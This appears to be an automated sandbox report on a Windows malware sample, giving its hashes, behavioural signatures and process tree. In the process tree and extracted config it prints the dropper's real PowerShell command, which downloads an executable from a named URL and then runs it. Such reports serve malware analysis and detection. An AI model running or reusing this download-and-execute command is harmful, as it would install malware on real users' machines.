Analysis
-
max time kernel
80s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 21:14
Behavioral task
behavioral1
Sample
17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe
Resource
win7-20241010-en
7 signatures
120 seconds
General
-
Target
17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe
-
Size
89KB
-
MD5
8ab6d02d09997d5a1db2420aa60bb0e0
-
SHA1
67d2e628591e369c658cc2a65aa88b1fb8eb5863
-
SHA256
17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3
-
SHA512
8ed4116295add2915c4957f4c5af54d6a7f02d3b961278e63dd7fe730d6f41686550b3b2156cdce2df2e848358b8ece38157ace9762162a071aed3a7670d7447
-
SSDEEP
1536:zMFWeATa+8j6IuQ1crSgUZdnXAvU/XPNwsWh/5tDdWcFfjEQM3U0LRMaE:I7Z+LIB/n4U/fid9jpNfjEB37MaE
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1636 powershell.exe 7 1636 powershell.exe 8 1636 powershell.exe -
pid Process 1636 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 raw.githubusercontent.com 7 raw.githubusercontent.com 8 raw.githubusercontent.com -
resource yara_rule behavioral1/memory/1976-0-0x0000000000400000-0x000000000040E000-memory.dmp upx behavioral1/memory/1976-15-0x0000000000400000-0x000000000040E000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1976 wrote to memory of 2012 1976 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe 31 PID 1976 wrote to memory of 2012 1976 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe 31 PID 1976 wrote to memory of 2012 1976 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe 31 PID 2012 wrote to memory of 1636 2012 cmd.exe 32 PID 2012 wrote to memory of 1636 2012 cmd.exe 32 PID 2012 wrote to memory of 1636 2012 cmd.exe 32 PID 1976 wrote to memory of 2720 1976 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe 33 PID 1976 wrote to memory of 2720 1976 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe 33 PID 1976 wrote to memory of 2720 1976 17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe"C:\Users\Admin\AppData\Local\Temp\17b2aa16bbf19ea943006c22aa00a07d20285d964fa9f0a27152fb563f43e2d3N.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox', 'that3.exe')2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('https://raw.githack.com/i87924hgasdhg/hgytiryty/master/busybox', 'that3.exe')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c that3.exe2⤵PID:2720
-